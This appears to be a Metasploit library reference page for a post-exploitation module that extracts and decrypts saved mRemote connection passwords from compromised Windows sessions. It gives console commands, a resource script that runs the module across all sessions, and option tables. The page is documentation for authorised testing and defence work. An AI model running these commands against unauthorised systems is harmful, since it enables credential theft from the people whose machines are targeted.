Windows Gather mRemote Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/mremote metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather mRemote Saved Password Extraction
Module: post/windows/gather/credentials/mremote
Source code: modules/post/windows/gather/credentials/mremote.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts saved passwords from mRemote. mRemote stores connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves the passwords in an encrypted format. The module will extract the connection info and decrypt the saved passwords.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/mremote

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/mremote
msf post(mremote) > show options
    ... show and set options ...
msf post(mremote) > set SESSION session-id
msf post(mremote) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/mremote")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/mremote post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/mremote

msf6 post(windows/gather/credentials/mremote) > show info

       Name: Windows Gather mRemote Saved Password Extraction
     Module: post/windows/gather/credentials/mremote
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>
  hdm <[email protected]>
  mubix <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts saved passwords from mRemote. mRemote stores 
  connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. 
  It saves the passwords in an encrypted format. The module will 
  extract the connection info and decrypt the saved passwords.

Module Options


This is a complete list of options available in the windows/gather/credentials/mremote post exploitation module:

msf6 post(windows/gather/credentials/mremote) > show options

Module options (post/windows/gather/credentials/mremote):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/mremote post exploitation module:

msf6 post(windows/gather/credentials/mremote) > show advanced

Module advanced options (post/windows/gather/credentials/mremote):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/mremote module can do:

msf6 post(windows/gather/credentials/mremote) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/mremote post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/mremote) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The file <PATH> either could not be read or does not exist


Here is a relevant code snippet related to the "The file <PATH> either could not be read or does not exist" error message:

53:	        vprint_good("confCons.xml saved to #{loot_path}")
54:	        parse_xml(condata)
55:	        print_status("Finished processing #{path}")
56:	      end
57:	    rescue Rex::Post::Meterpreter::RequestError
58:	      print_status("The file #{path} either could not be read or does not exist")
59:	      return
60:	    end
61:	  end
62:	
63:	  def parse_xml(data)

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • theLightCosine
  • hdm
  • mubix

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.